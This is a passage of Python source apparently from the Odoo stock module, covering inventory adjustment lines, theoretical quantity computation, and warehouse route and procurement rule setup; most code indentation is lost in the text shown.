self.write(cr, uid, [inv.id], {'state': 'done'}, context=context)
self.post_inventory(cr, uid, inv, context=context)
return True
def post_inventory(self, cr, uid, inv, context=None):
        #The inventory is posted as a single step: quants cannot be moved from one internal location to another using an inventory,
        #as they will be moved to the inventory loss location, and other quants will be created in the counted location. This is normal behaviour,
        #as quants cannot be reused from the inventory location (users can still manually move the products before/after the inventory if they want).
move_obj = self.pool.get('stock.move')
move_obj.action_done(cr, uid, [x.id for x in inv.move_ids if x.state != 'done'], context=context)
def action_check(self, cr, uid, ids, context=None):
""" Checks the inventory and computes the stock move to do
@return: True
"""
inventory_line_obj = self.pool.get('stock.inventory.line')
stock_move_obj = self.pool.get('stock.move')
for inventory in self.browse(cr, uid, ids, context=context):
#first remove the existing stock moves linked to this inventory
move_ids = [move.id for move in inventory.move_ids]
stock_move_obj.unlink(cr, uid, move_ids, context=context)
for line in inventory.line_ids:
                #compare the checked quantities on inventory lines to the theoretical ones
stock_move = inventory_line_obj._resolve_inventory_line(cr, uid, line, context=context)
def action_cancel_draft(self, cr, uid, ids, context=None):
""" Cancels the stock move and change inventory state to draft.
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [inv.id], {'line_ids': [(5,)]}, context=context)
self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state': 'draft'}, context=context)
return True
def action_cancel_inventory(self, cr, uid, ids, context=None):
self.action_cancel_draft(cr, uid, ids, context=context)
def prepare_inventory(self, cr, uid, ids, context=None):
inventory_line_obj = self.pool.get('stock.inventory.line')
for inventory in self.browse(cr, uid, ids, context=context):
# If there are inventory lines already (e.g. from import), respect those and set their theoretical qty
line_ids = [line.id for line in inventory.line_ids]
if not line_ids and inventory.filter != 'partial':
#compute the inventory lines and create them
vals = self._get_inventory_lines(cr, uid, inventory, context=context)
for product_line in vals:
inventory_line_obj.create(cr, uid, product_line, context=context)
return self.write(cr, uid, ids, {'state': 'confirm', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})
def _get_inventory_lines(self, cr, uid, inventory, context=None):
location_obj = self.pool.get('stock.location')
product_obj = self.pool.get('product.product')
location_ids = location_obj.search(cr, uid, [('id', 'child_of', [inventory.location_id.id])], context=context)
domain = ' location_id in %s'
args = (tuple(location_ids),)
if inventory.company_id.id:
domain += ' and company_id = %s'
args += (inventory.company_id.id,)
if inventory.partner_id:
domain += ' and owner_id = %s'
args += (inventory.partner_id.id,)
if inventory.lot_id:
domain += ' and lot_id = %s'
args += (inventory.lot_id.id,)
if inventory.product_id:
domain += ' and product_id = %s'
args += (inventory.product_id.id,)
if inventory.package_id:
domain += ' and package_id = %s'
args += (inventory.package_id.id,)
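        # The WHERE clause is built incrementally from the selected filters; e.g. with a company
        # and a product it becomes " location_id in %s and company_id = %s and product_id = %s",
        # with the corresponding values passed as query parameters in `args`.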
cr.execute('''
SELECT product_id, sum(qty) as product_qty, location_id, lot_id as prod_lot_id, package_id, owner_id as partner_id
FROM stock_quant WHERE''' + domain + '''
GROUP BY product_id, location_id, lot_id, package_id, partner_id
''', args)
vals = []
for product_line in cr.dictfetchall():
            #replace the None values in the dictionary by False, because falsy values are tested later on
for key, value in product_line.items():
if not value:
product_line[key] = False
product_line['inventory_id'] = inventory.id
product_line['theoretical_qty'] = product_line['product_qty']
if product_line['product_id']:
product = product_obj.browse(cr, uid, product_line['product_id'], context=context)
product_line['product_uom_id'] = product.uom_id.id
vals.append(product_line)
return vals
def _check_filter_product(self, cr, uid, ids, context=None):
for inventory in self.browse(cr, uid, ids, context=context):
if inventory.filter == 'none' and inventory.product_id and inventory.location_id and inventory.lot_id:
return True
if inventory.filter not in ('product', 'product_owner') and inventory.product_id:
return False
if inventory.filter != 'lot' and inventory.lot_id:
return False
if inventory.filter not in ('owner', 'product_owner') and inventory.partner_id:
return False
if inventory.filter != 'pack' and inventory.package_id:
return False
return True
def onchange_filter(self, cr, uid, ids, filter, context=None):
to_clean = { 'value': {} }
if filter not in ('product', 'product_owner'):
to_clean['value']['product_id'] = False
if filter != 'lot':
to_clean['value']['lot_id'] = False
if filter not in ('owner', 'product_owner'):
to_clean['value']['partner_id'] = False
if filter != 'pack':
to_clean['value']['package_id'] = False
return to_clean
_constraints = [
(_check_filter_product, 'The selected inventory options are not coherent.',
['filter', 'product_id', 'lot_id', 'partner_id', 'package_id']),
]
class stock_inventory_line(osv.osv):
_name = "stock.inventory.line"
_description = "Inventory Line"
_order = "inventory_id, location_name, product_code, product_name, prodlot_name"
def _get_product_name_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('product_id', 'in', ids)], context=context)
def _get_location_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('location_id', 'in', ids)], context=context)
def _get_prodlot_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('prod_lot_id', 'in', ids)], context=context)
def _get_theoretical_qty(self, cr, uid, ids, name, args, context=None):
res = {}
quant_obj = self.pool["stock.quant"]
uom_obj = self.pool["product.uom"]
for line in self.browse(cr, uid, ids, context=context):
quant_ids = self._get_quants(cr, uid, line, context=context)
quants = quant_obj.browse(cr, uid, quant_ids, context=context)
tot_qty = sum([x.qty for x in quants])
if line.product_uom_id and line.product_id.uom_id.id != line.product_uom_id.id:
tot_qty = uom_obj._compute_qty_obj(cr, uid, line.product_id.uom_id, tot_qty, line.product_uom_id, context=context)
res[line.id] = tot_qty
return res
_columns = {
'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True, select=True),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
'package_id': fields.many2one('stock.quant.package', 'Pack', select=True),
'product_uom_id': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
'product_qty': fields.float('Checked Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'company_id': fields.related('inventory_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, select=True, readonly=True),
'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
'state': fields.related('inventory_id', 'state', type='char', string='Status', readonly=True),
'theoretical_qty': fields.function(_get_theoretical_qty, type='float', digits_compute=dp.get_precision('Product Unit of Measure'),
store={'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['location_id', 'product_id', 'package_id', 'product_uom_id', 'company_id', 'prod_lot_id', 'partner_id'], 20),},
readonly=True, string="Theoretical Quantity"),
'partner_id': fields.many2one('res.partner', 'Owner'),
'product_name': fields.related('product_id', 'name', type='char', string='Product Name', store={
'product.product': (_get_product_name_change, ['name', 'default_code'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['product_id'], 20),}),
'product_code': fields.related('product_id', 'default_code', type='char', string='Product Code', store={
'product.product': (_get_product_name_change, ['name', 'default_code'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['product_id'], 20),}),
'location_name': fields.related('location_id', 'complete_name', type='char', string='Location Name', store={
'stock.location': (_get_location_change, ['name', 'location_id', 'active'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['location_id'], 20),}),
'prodlot_name': fields.related('prod_lot_id', 'name', type='char', string='Serial Number Name', store={
'stock.production.lot': (_get_prodlot_change, ['name'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['prod_lot_id'], 20),}),
}
_defaults = {
'product_qty': 0,
'product_uom_id': lambda self, cr, uid, ctx=None: self.pool['ir.model.data'].get_object_reference(cr, uid, 'product', 'product_uom_unit')[1]
}
def create(self, cr, uid, values, context=None):
product_obj = self.pool.get('product.product')
dom = [('product_id', '=', values.get('product_id')), ('inventory_id.state', '=', 'confirm'),
('location_id', '=', values.get('location_id')), ('partner_id', '=', values.get('partner_id')),
('package_id', '=', values.get('package_id')), ('prod_lot_id', '=', values.get('prod_lot_id'))]
res = self.search(cr, uid, dom, context=context)
if res:
location = self.pool['stock.location'].browse(cr, uid, values.get('location_id'), context=context)
product = product_obj.browse(cr, uid, values.get('product_id'), context=context)
raise UserError(_("You cannot have two inventory adjustements in state 'in Progess' with the same product(%s), same location(%s), same package, same owner and same lot. Please first validate the first inventory adjustement with this product before creating another one.") % (product.name, location.name))
if 'product_id' in values and not 'product_uom_id' in values:
values['product_uom_id'] = product_obj.browse(cr, uid, values.get('product_id'), context=context).uom_id.id
return super(stock_inventory_line, self).create(cr, uid, values, context=context)
def _get_quants(self, cr, uid, line, context=None):
quant_obj = self.pool["stock.quant"]
dom = [('company_id', '=', line.company_id.id), ('location_id', '=', line.location_id.id), ('lot_id', '=', line.prod_lot_id.id),
('product_id','=', line.product_id.id), ('owner_id', '=', line.partner_id.id), ('package_id', '=', line.package_id.id)]
quants = quant_obj.search(cr, uid, dom, context=context)
return quants
def onchange_createline(self, cr, uid, ids, location_id=False, product_id=False, uom_id=False, package_id=False, prod_lot_id=False, partner_id=False, company_id=False, context=None):
quant_obj = self.pool["stock.quant"]
uom_obj = self.pool["product.uom"]
res = {'value': {}}
        # If no UoM is set yet, put the default UoM of the product
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
uom = self.pool['product.uom'].browse(cr, uid, uom_id, context=context)
if product.uom_id.category_id.id != uom.category_id.id:
res['value']['product_uom_id'] = product.uom_id.id
res['domain'] = {'product_uom_id': [('category_id','=',product.uom_id.category_id.id)]}
uom_id = product.uom_id.id
# Calculate theoretical quantity by searching the quants as in quants_get
if product_id and location_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if not company_id:
company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
dom = [('company_id', '=', company_id), ('location_id', '=', location_id), ('lot_id', '=', prod_lot_id),
('product_id','=', product_id), ('owner_id', '=', partner_id), ('package_id', '=', package_id)]
quants = quant_obj.search(cr, uid, dom, context=context)
th_qty = sum([x.qty for x in quant_obj.browse(cr, uid, quants, context=context)])
if product_id and uom_id and product.uom_id.id != uom_id:
th_qty = uom_obj._compute_qty(cr, uid, product.uom_id.id, th_qty, uom_id)
res['value']['theoretical_qty'] = th_qty
res['value']['product_qty'] = th_qty
return res
def _resolve_inventory_line(self, cr, uid, inventory_line, context=None):
stock_move_obj = self.pool.get('stock.move')
quant_obj = self.pool.get('stock.quant')
diff = inventory_line.theoretical_qty - inventory_line.product_qty
if not diff:
return
        #each line where the difference between the theoretical and the checked quantity is not 0 requires a stock move
vals = {
'name': _('INV:') + (inventory_line.inventory_id.name or ''),
'product_id': inventory_line.product_id.id,
'product_uom': inventory_line.product_uom_id.id,
'date': inventory_line.inventory_id.date,
'company_id': inventory_line.inventory_id.company_id.id,
'inventory_id': inventory_line.inventory_id.id,
'state': 'confirmed',
'restrict_lot_id': inventory_line.prod_lot_id.id,
'restrict_partner_id': inventory_line.partner_id.id,
}
inventory_location_id = inventory_line.product_id.property_stock_inventory.id
if diff < 0:
#found more than expected
vals['location_id'] = inventory_location_id
vals['location_dest_id'] = inventory_line.location_id.id
vals['product_uom_qty'] = -diff
else:
#found less than expected
vals['location_id'] = inventory_line.location_id.id
vals['location_dest_id'] = inventory_location_id
vals['product_uom_qty'] = diff
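        # Example: with a theoretical quantity of 10 and a counted quantity of 12, diff is -2 and
        # a move of 2 units is created from the inventory loss location into the counted location;
        # with a count of 7, diff is 3 and the move goes the other way.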
move_id = stock_move_obj.create(cr, uid, vals, context=context)
move = stock_move_obj.browse(cr, uid, move_id, context=context)
if diff > 0:
domain = [('qty', '>', 0.0), ('package_id', '=', inventory_line.package_id.id), ('lot_id', '=', inventory_line.prod_lot_id.id), ('location_id', '=', inventory_line.location_id.id)]
preferred_domain_list = [[('reservation_id', '=', False)], [('reservation_id.inventory_id', '!=', inventory_line.inventory_id.id)]]
quants = quant_obj.quants_get_preferred_domain(cr, uid, move.product_qty, move, domain=domain, preferred_domain_list=preferred_domain_list)
quant_obj.quants_reserve(cr, uid, quants, move, context=context)
elif inventory_line.package_id:
stock_move_obj.action_done(cr, uid, move_id, context=context)
quants = [x.id for x in move.quant_ids]
quant_obj.write(cr, SUPERUSER_ID, quants, {'package_id': inventory_line.package_id.id}, context=context)
res = quant_obj.search(cr, uid, [('qty', '<', 0.0), ('product_id', '=', move.product_id.id),
('location_id', '=', move.location_dest_id.id), ('package_id', '!=', False)], limit=1, context=context)
if res:
for quant in move.quant_ids:
                    if quant.location_id.id == move.location_dest_id.id: #To avoid taking a quant that was already reconciled
quant_obj._quant_reconcile_negative(cr, uid, quant, move, context=context)
return move_id
# Should be left out in next version
def restrict_change(self, cr, uid, ids, theoretical_qty, context=None):
return {}
# Should be left out in next version
def on_change_product_id(self, cr, uid, ids, product, uom, theoretical_qty, context=None):
""" Changes UoM
        @param product: Changed product_id
        @param uom: UoM of the product
@return: Dictionary of changed values
"""
if not product:
return {'value': {'product_uom_id': False}}
obj_product = self.pool.get('product.product').browse(cr, uid, product, context=context)
return {'value': {'product_uom_id': uom or obj_product.uom_id.id}}
#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
_name = "stock.warehouse"
_description = "Warehouse"
_columns = {
'name': fields.char('Warehouse Name', required=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, select=True),
'partner_id': fields.many2one('res.partner', 'Address'),
'view_location_id': fields.many2one('stock.location', 'View Location', required=True, domain=[('usage', '=', 'view')]),
'lot_stock_id': fields.many2one('stock.location', 'Location Stock', domain=[('usage', '=', 'internal')], required=True),
'code': fields.char('Short Name', size=5, required=True, help="Short name used to identify your warehouse"),
        'route_ids': fields.many2many('stock.location.route', 'stock_route_warehouse', 'warehouse_id', 'route_id', 'Routes', domain="[('warehouse_selectable', '=', True)]", help='Default routes through the warehouse'),
'reception_steps': fields.selection([
('one_step', 'Receive goods directly in stock (1 step)'),
('two_steps', 'Unload in input location then go to stock (2 steps)'),
('three_steps', 'Unload in input location, go through a quality control before being admitted in stock (3 steps)')], 'Incoming Shipments',
help="Default incoming route to follow", required=True),
'delivery_steps': fields.selection([
('ship_only', 'Ship directly from stock (Ship only)'),
('pick_ship', 'Bring goods to output location before shipping (Pick + Ship)'),
            ('pick_pack_ship', 'Make packages into a dedicated location, then bring them to the output location for shipping (Pick + Pack + Ship)')], 'Outgoing Shipments',
help="Default outgoing route to follow", required=True),
'wh_input_stock_loc_id': fields.many2one('stock.location', 'Input Location'),
'wh_qc_stock_loc_id': fields.many2one('stock.location', 'Quality Control Location'),
'wh_output_stock_loc_id': fields.many2one('stock.location', 'Output Location'),
'wh_pack_stock_loc_id': fields.many2one('stock.location', 'Packing Location'),
'mto_pull_id': fields.many2one('procurement.rule', 'MTO rule'),
'pick_type_id': fields.many2one('stock.picking.type', 'Pick Type'),
'pack_type_id': fields.many2one('stock.picking.type', 'Pack Type'),
'out_type_id': fields.many2one('stock.picking.type', 'Out Type'),
'in_type_id': fields.many2one('stock.picking.type', 'In Type'),
'int_type_id': fields.many2one('stock.picking.type', 'Internal Type'),
'crossdock_route_id': fields.many2one('stock.location.route', 'Crossdock Route'),
'reception_route_id': fields.many2one('stock.location.route', 'Receipt Route'),
'delivery_route_id': fields.many2one('stock.location.route', 'Delivery Route'),
'resupply_from_wh': fields.boolean('Resupply From Other Warehouses', help='Unused field'),
'resupply_wh_ids': fields.many2many('stock.warehouse', 'stock_wh_resupply_table', 'supplied_wh_id', 'supplier_wh_id', 'Resupply Warehouses'),
'resupply_route_ids': fields.one2many('stock.location.route', 'supplied_wh_id', 'Resupply Routes',
help="Routes will be created for these resupply warehouses and you can select them on products and product categories"),
'default_resupply_wh_id': fields.many2one('stock.warehouse', 'Default Resupply Warehouse', help="Goods will always be resupplied from this warehouse"),
}
def onchange_filter_default_resupply_wh_id(self, cr, uid, ids, default_resupply_wh_id, resupply_wh_ids, context=None):
resupply_wh_ids = set([x['id'] for x in (self.resolve_2many_commands(cr, uid, 'resupply_wh_ids', resupply_wh_ids, ['id']))])
if default_resupply_wh_id: #If we are removing the default resupply, we don't have default_resupply_wh_id
resupply_wh_ids.add(default_resupply_wh_id)
resupply_wh_ids = list(resupply_wh_ids)
return {'value': {'resupply_wh_ids': resupply_wh_ids}}
def _get_external_transit_location(self, cr, uid, warehouse, context=None):
''' returns browse record of inter company transit location, if found'''
data_obj = self.pool.get('ir.model.data')
location_obj = self.pool.get('stock.location')
try:
inter_wh_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_inter_wh')[1]
except:
return False
return location_obj.browse(cr, uid, inter_wh_loc, context=context)
def _get_inter_wh_route(self, cr, uid, warehouse, wh, context=None):
return {
'name': _('%s: Supply Product from %s') % (warehouse.name, wh.name),
'warehouse_selectable': False,
'product_selectable': True,
'product_categ_selectable': True,
'supplied_wh_id': warehouse.id,
'supplier_wh_id': wh.id,
}
def _create_resupply_routes(self, cr, uid, warehouse, supplier_warehouses, default_resupply_wh, context=None):
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
#create route selectable on the product to resupply the warehouse from another one
external_transit_location = self._get_external_transit_location(cr, uid, warehouse, context=context)
internal_transit_location = warehouse.company_id.internal_transit_location_id
input_loc = warehouse.wh_input_stock_loc_id
if warehouse.reception_steps == 'one_step':
input_loc = warehouse.lot_stock_id
for wh in supplier_warehouses:
transit_location = wh.company_id.id == warehouse.company_id.id and internal_transit_location or external_transit_location
if transit_location:
output_loc = wh.wh_output_stock_loc_id
if wh.delivery_steps == 'ship_only':
output_loc = wh.lot_stock_id
                    # Create extra MTO rule (only for 'ship only' because in the other cases MTO rules already exist)
mto_pull_vals = self._get_mto_pull_rule(cr, uid, wh, [(output_loc, transit_location, wh.out_type_id.id)], context=context)[0]
pull_obj.create(cr, uid, mto_pull_vals, context=context)
inter_wh_route_vals = self._get_inter_wh_route(cr, uid, warehouse, wh, context=context)
inter_wh_route_id = route_obj.create(cr, uid, vals=inter_wh_route_vals, context=context)
values = [(output_loc, transit_location, wh.out_type_id.id, wh), (transit_location, input_loc, warehouse.in_type_id.id, warehouse)]
pull_rules_list = self._get_supply_pull_rules(cr, uid, wh.id, values, inter_wh_route_id, context=context)
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#if the warehouse is also set as default resupply method, assign this route automatically to the warehouse
if default_resupply_wh and default_resupply_wh.id == wh.id:
self.write(cr, uid, [warehouse.id, wh.id], {'route_ids': [(4, inter_wh_route_id)]}, context=context)
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'reception_steps': 'one_step',
'delivery_steps': 'ship_only',
}
_sql_constraints = [
('warehouse_name_uniq', 'unique(name, company_id)', 'The name of the warehouse must be unique per company!'),
('warehouse_code_uniq', 'unique(code, company_id)', 'The code of the warehouse must be unique per company!'),
]
def _get_partner_locations(self, cr, uid, ids, context=None):
''' returns a tuple made of the browse record of customer location and the browse record of supplier location'''
data_obj = self.pool.get('ir.model.data')
location_obj = self.pool.get('stock.location')
try:
customer_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_customers')[1]
supplier_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_suppliers')[1]
except:
customer_loc = location_obj.search(cr, uid, [('usage', '=', 'customer')], context=context)
customer_loc = customer_loc and customer_loc[0] or False
supplier_loc = location_obj.search(cr, uid, [('usage', '=', 'supplier')], context=context)
supplier_loc = supplier_loc and supplier_loc[0] or False
if not (customer_loc and supplier_loc):
raise UserError(_('Can\'t find any customer or supplier location.'))
return location_obj.browse(cr, uid, [customer_loc, supplier_loc], context=context)
def _location_used(self, cr, uid, location_id, warehouse, context=None):
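        # A location is considered "used" when any procurement (pull) rule or push rule outside
        # this warehouse's own routes references it as source or destination; such locations are
        # not archived when the reception/delivery steps change.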
pull_obj = self.pool['procurement.rule']
push_obj = self.pool['stock.location.path']
domain = ['&', ('route_id', 'not in', [x.id for x in warehouse.route_ids]),
'|', ('location_src_id', '=', location_id), # noqa
('location_id', '=', location_id)
]
pulls = pull_obj.search_count(cr, uid, domain, context=context)
domain = ['&', ('route_id', 'not in', [x.id for x in warehouse.route_ids]),
'|', ('location_from_id', '=', location_id), # noqa
('location_dest_id', '=', location_id)
]
pushs = push_obj.search_count(cr, uid, domain, context=context)
if pulls or pushs:
return True
return False
def switch_location(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
location_obj = self.pool.get('stock.location')
new_reception_step = new_reception_step or warehouse.reception_steps
new_delivery_step = new_delivery_step or warehouse.delivery_steps
if warehouse.reception_steps != new_reception_step:
if not self._location_used(cr, uid, warehouse.wh_input_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_input_stock_loc_id.id, warehouse.wh_qc_stock_loc_id.id], {'active': False}, context=context)
if new_reception_step != 'one_step':
location_obj.write(cr, uid, warehouse.wh_input_stock_loc_id.id, {'active': True}, context=context)
if new_reception_step == 'three_steps':
location_obj.write(cr, uid, warehouse.wh_qc_stock_loc_id.id, {'active': True}, context=context)
if warehouse.delivery_steps != new_delivery_step:
if not self._location_used(cr, uid, warehouse.wh_output_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_output_stock_loc_id.id], {'active': False}, context=context)
if not self._location_used(cr, uid, warehouse.wh_pack_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_pack_stock_loc_id.id], {'active': False}, context=context)
if new_delivery_step != 'ship_only':
location_obj.write(cr, uid, warehouse.wh_output_stock_loc_id.id, {'active': True}, context=context)
if new_delivery_step == 'pick_pack_ship':
location_obj.write(cr, uid, warehouse.wh_pack_stock_loc_id.id, {'active': True}, context=context)
return True
def _get_reception_delivery_route(self, cr, uid, warehouse, route_name, context=None):
return {
'name': self._format_routename(cr, uid, warehouse, route_name, context=context),
'product_categ_selectable': True,
'product_selectable': False,
'sequence': 10,
}
def _get_supply_pull_rules(self, cr, uid, supply_warehouse, values, new_route_id, context=None):
pull_rules_list = []
for from_loc, dest_loc, pick_type_id, warehouse in values:
pull_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': new_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
                'procure_method': warehouse.lot_stock_id.id != from_loc.id and 'make_to_order' or 'make_to_stock', # first part of the resupply route is MTS
'warehouse_id': warehouse.id,
'propagate_warehouse_id': supply_warehouse,
})
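            # Only the rule pulling from the supplying warehouse's own stock location is
            # make_to_stock; every other leg (e.g. transit -> input) is make_to_order so the
            # procurement is propagated up the resupply chain.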
return pull_rules_list
def _get_push_pull_rules(self, cr, uid, warehouse, active, values, new_route_id, context=None):
first_rule = True
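        # The first leg of a chained route is make_to_stock (served from available stock);
        # every subsequent leg is make_to_order so it waits for the previous leg to bring the goods.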
push_rules_list = []
pull_rules_list = []
for from_loc, dest_loc, pick_type_id in values:
push_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_from_id': from_loc.id,
'location_dest_id': dest_loc.id,
'route_id': new_route_id,
'auto': 'manual',
'picking_type_id': pick_type_id,
'active': active,
'warehouse_id': warehouse.id,
})
pull_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': new_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
'procure_method': first_rule is True and 'make_to_stock' or 'make_to_order',
'active': active,
'warehouse_id': warehouse.id,
})
first_rule = False
return push_rules_list, pull_rules_list
def _get_mto_route(self, cr, uid, context=None):
route_obj = self.pool.get('stock.location.route')
data_obj = self.pool.get('ir.model.data')
try:
mto_route_id = data_obj.get_object_reference(cr, uid, 'stock', 'route_warehouse0_mto')[1]
except:
mto_route_id = route_obj.search(cr, uid, [('name', 'like', _('Make To Order'))], context=context)
mto_route_id = mto_route_id and mto_route_id[0] or False
if not mto_route_id:
raise UserError(_('Can\'t find any generic Make To Order route.'))
return mto_route_id
def _check_remove_mto_resupply_rules(self, cr, uid, warehouse, context=None):
""" Checks that the moves from the different """
pull_obj = self.pool.get('procurement.rule')
mto_route_id = self._get_mto_route(cr, uid, context=context)
rules = pull_obj.search(cr, uid, ['&', ('location_src_id', '=', warehouse.lot_stock_id.id), ('location_id.usage', '=', 'transit')], context=context)
pull_obj.unlink(cr, uid, rules, context=context)
def _get_mto_pull_rule(self, cr, uid, warehouse, values, context=None):
mto_route_id = self._get_mto_route(cr, uid, context=context)
res = []
for value in values:
from_loc, dest_loc, pick_type_id = value
res += [{
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context) + _(' MTO'),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': mto_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
'procure_method': 'make_to_order',
'active': True,
'warehouse_id': warehouse.id,
}]
return res
def _get_crossdock_route(self, cr, uid, warehouse, route_name, context=None):
return {
'name': self._format_routename(cr, uid, warehouse, route_name, context=context),
'warehouse_selectable': False,
'product_selectable': True,
'product_categ_selectable': True,
'active': warehouse.delivery_steps != 'ship_only' and warehouse.reception_steps != 'one_step',
'sequence': 20,
}
def create_routes(self, cr, uid, ids, warehouse, context=None):
wh_route_ids = []
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
routes_dict = self.get_routes_dict(cr, uid, ids, warehouse, context=context)
#create reception route and rules
route_name, values = routes_dict[warehouse.reception_steps]
route_vals = self._get_reception_delivery_route(cr, uid, warehouse, route_name, context=context)
reception_route_id = route_obj.create(cr, uid, route_vals, context=context)
wh_route_ids.append((4, reception_route_id))
push_rules_list, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, reception_route_id, context=context)
#create the push/procurement rules
for push_rule in push_rules_list:
push_obj.create(cr, uid, vals=push_rule, context=context)
for pull_rule in pull_rules_list:
#all procurement rules in reception route are mto, because we don't want to wait for the scheduler to trigger an orderpoint on input location
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
        #create MTS route and procurement rules for delivery and a specific MTO route to be set on the product
route_name, values = routes_dict[warehouse.delivery_steps]
route_vals = self._get_reception_delivery_route(cr, uid, warehouse, route_name, context=context)
#create the route and its procurement rules
delivery_route_id = route_obj.create(cr, uid, route_vals, context=context)
wh_route_ids.append((4, delivery_route_id))
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, delivery_route_id, context=context)
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#create MTO procurement rule and link it to the generic MTO route
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, values, context=context)[0]
mto_pull_id = pull_obj.create(cr, uid, mto_pull_vals, context=context)
#create a route for cross dock operations, that can be set on products and product categories
route_name, values = routes_dict['crossdock']
crossdock_route_vals = self._get_crossdock_route(cr, uid, warehouse, route_name, context=context)
crossdock_route_id = route_obj.create(cr, uid, vals=crossdock_route_vals, context=context)
wh_route_ids.append((4, crossdock_route_id))
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, warehouse.delivery_steps != 'ship_only' and warehouse.reception_steps != 'one_step', values, crossdock_route_id, context=context)
for pull_rule in pull_rules_list:
# Fixed cross-dock is logically mto
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#create route selectable on the product to resupply the warehouse from another one
self._create_resupply_routes(cr, uid, warehouse, warehouse.resupply_wh_ids, warehouse.default_resupply_wh_id, context=context)
#return routes and mto procurement rule to store on the warehouse
return {
'route_ids': wh_route_ids,
'mto_pull_id': mto_pull_id,
'reception_route_id': reception_route_id,
'delivery_route_id': delivery_route_id,
'crossdock_route_id': crossdock_route_id,
}
def change_route(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
picking_type_obj = self.pool.get('stock.picking.type')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
route_obj = self.pool.get('stock.location.route')
new_reception_step = new_reception_step or warehouse.reception_steps
new_delivery_step = new_delivery_step or warehouse.delivery_steps
#change the default source and destination location and (de)activate picking types
input_loc = warehouse.wh_input_stock_loc_id
if new_reception_step == 'one_step':
input_loc = warehouse.lot_stock_id
output_loc = warehouse.wh_output_stock_loc_id
if new_delivery_step == 'ship_only':
output_loc = warehouse.lot_stock_id
picking_type_obj.write(cr, uid, warehouse.in_type_id.id, {'default_location_dest_id': input_loc.id}, context=context)
picking_type_obj.write(cr, uid, warehouse.out_type_id.id, {'default_location_src_id': output_loc.id}, context=context)
picking_type_obj.write(cr, uid, warehouse.pick_type_id.id, {
'active': new_delivery_step != 'ship_only',
'default_location_dest_id': output_loc.id if new_delivery_step == 'pick_ship' else warehouse.wh_pack_stock_loc_id.id,
}, context=context)
picking_type_obj.write(cr, uid, warehouse.pack_type_id.id, {'active': new_delivery_step == 'pick_pack_ship'}, context=context)
routes_dict = self.get_routes_dict(cr, uid, ids, warehouse, context=context)
#update delivery route and rules: unlink the existing rules of the warehouse delivery route and recreate it
pull_obj.unlink(cr, uid, [pu.id for pu in warehouse.delivery_route_id.pull_ids], context=context)
route_name, values = routes_dict[new_delivery_step]
route_obj.write(cr, uid, warehouse.delivery_route_id.id, {'name': self._format_routename(cr, uid, warehouse, route_name, context=context)}, context=context)
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, warehouse.delivery_route_id.id, context=context)
